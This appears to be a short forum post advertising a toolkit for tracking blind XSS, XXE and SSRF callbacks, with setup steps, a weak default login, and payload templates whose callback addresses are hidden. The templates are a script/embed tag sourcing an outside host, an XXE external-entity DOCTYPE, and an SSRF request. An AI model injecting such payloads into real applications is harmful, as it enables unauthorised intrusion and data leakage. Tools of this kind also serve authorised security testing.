Toolkit to detect and keep track on Blind XSS, XXE & SSRF
SETUP
Upload the files to your server.
Create a Database and upload database.sql file to it.
Change the DB Credentials in db.php file.
Ready.
USAGE
BLIND XSS
<embed src="[Hidden Content];
<script src="[Hidden Content];
BLIND XXE
<?xml version="1.0" ?>
<!DOCTYPE root [
<!ENTITY % ext SYSTEM "[Hidden Content]; %ext;
]>
<r></r>
SSRF
GET /testssrf.php=[Hidden Content]
DEFAULT CREDENTIALS
USER :
[email protected]
PASS : 123456
Source & Download
[hide][Hidden Content]]